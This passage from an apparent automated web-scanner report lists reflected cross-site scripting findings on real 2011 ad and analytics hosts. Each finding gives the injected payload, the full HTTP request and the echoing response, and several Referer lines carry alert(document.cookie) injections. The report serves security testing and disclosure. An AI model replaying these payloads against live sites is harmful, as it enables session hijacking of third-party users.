The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
4.1. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ads.bluelithium.com
Path: /st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d6da"-alert(1)-"f1f4da902d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /st?ad_type=iframe&ad_size=1x1&section=1603038&9d6da"-alert(1)-"f1f4da902d6=1 HTTP/1.1 Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1099 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:00:03 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Wed, 19 Jan 2011 18:00:03 GMT Pragma: no-cache Content-Length: 4636 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9d6da"-alert(1)-"f1f4da902d6=1&Z=1x1&s=1603038&_salt=3571184072";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 842ab'%3balert(1)//40a370322b1 was submitted in the h parameter. This input was echoed as 842ab';alert(1)//40a370322b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=2DFE311&w=300&h=250842ab'%3balert(1)//40a370322b1 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Wed, 19 Jan 2011 17:59:36 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a473c"%3balert(1)//5cda4ab509d was submitted in the pid parameter. This input was echoed as a473c";alert(1)//5cda4ab509d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=2DFE311a473c"%3balert(1)//5cda4ab509d&w=300&h=250 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Wed, 19 Jan 2011 17:59:28 GMT
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311a473c";alert(1)//5cda4ab509d&rand=" + myRand;
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b68a5'%3balert(1)//ef73ca3b12e was submitted in the w parameter. This input was echoed as b68a5';alert(1)//ef73ca3b12e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=2DFE311&w=300b68a5'%3balert(1)//ef73ca3b12e&h=250 HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT Content-Type: application/x-javascript Content-Length: 382 Date: Wed, 19 Jan 2011 17:59:32 GMT Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;
The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 56c1b<script>alert(1)</script>1d321066f7f was submitted in the c1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=256c1b<script>alert(1)</script>1d321066f7f&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:23 GMT Date: Wed, 19 Jan 2011 17:59:23 GMT Connection: close Content-Length: 3587
The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 33c9b<script>alert(1)</script>7d5427cace2 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=33c9b<script>alert(1)</script>7d5427cace2&tm=919330 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:36 GMT Date: Wed, 19 Jan 2011 17:59:36 GMT Connection: close Content-Length: 3581
The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 90558<script>alert(1)</script>0af258cd0b5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=603578690558<script>alert(1)</script>0af258cd0b5&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:24 GMT Date: Wed, 19 Jan 2011 17:59:24 GMT Connection: close Content-Length: 3587
The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 26bb2<script>alert(1)</script>dadffb12f82 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=603578626bb2<script>alert(1)</script>dadffb12f82&c4=&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:26 GMT Date: Wed, 19 Jan 2011 17:59:26 GMT Connection: close Content-Length: 3587
The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload f09c8<script>alert(1)</script>b3efd23cef2 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=2&c2=6035786&c3=6035786&c4=f09c8<script>alert(1)</script>b3efd23cef2&c5=&c6=&c15= HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:29 GMT Date: Wed, 19 Jan 2011 17:59:29 GMT Connection: close Content-Length: 3587
The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 77439<script>alert(1)</script>58583c10800 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=77439<script>alert(1)</script>58583c10800&c6=&c15=&tm=919330 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:32 GMT Date: Wed, 19 Jan 2011 17:59:32 GMT Connection: close Content-Length: 3581
The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 147af<script>alert(1)</script>202194faed4 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=147af<script>alert(1)</script>202194faed4&c15=&tm=919330 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=604800 Expires: Wed, 26 Jan 2011 17:59:34 GMT Date: Wed, 19 Jan 2011 17:59:34 GMT Connection: close Content-Length: 3581
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daf00'%3balert(1)//9a4146cf137 was submitted in the $ parameter. This input was echoed as daf00';alert(1)//9a4146cf137 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=daf00'%3balert(1)//9a4146cf137&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:daf00';alert(1)//9a4146cf137;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=524 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:01:02 GMT Connection: close Content-Length: 1990
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',daf00';alert(1)//9a4146cf137';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,daf00';alert(1)//9a4146cf137;z="+Math.random();}
The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e01e"%3balert(1)//82425b7431e was submitted in the $ parameter. This input was echoed as 1e01e";alert(1)//82425b7431e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=1e01e"%3balert(1)//82425b7431e&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:1e01e";alert(1)//82425b7431e;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=524 Expires: Wed, 19 Jan 2011 18:09:46 GMT Date: Wed, 19 Jan 2011 18:01:02 GMT Connection: close Content-Length: 1990
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',1e01e";alert(1)//82425b7431e';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=,1e01e";alert(1)//82425b7431e;z="+Math.random();}
4.14. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://d7.zedo.com
Path: /bar/v16-401/d3/jsc/fm.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19b1'-alert(1)-'4b1450f596b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?a19b1'-alert(1)-'4b1450f596b=1 HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 941 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0daa-82a5-4989a5927aac0" X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=253 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:46 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=0;var zzPat='';var zzCustom=''; if(typeof zzStr=='undefined'){ var zzStr="q=;z="+Math.random();}
The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd682'%3balert(1)//8194c718852 was submitted in the q parameter. This input was echoed as fd682';alert(1)//8194c718852 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bar/v16-401/d3/jsc/fm.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=fd682'%3balert(1)//8194c718852&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1
Response (redirected)
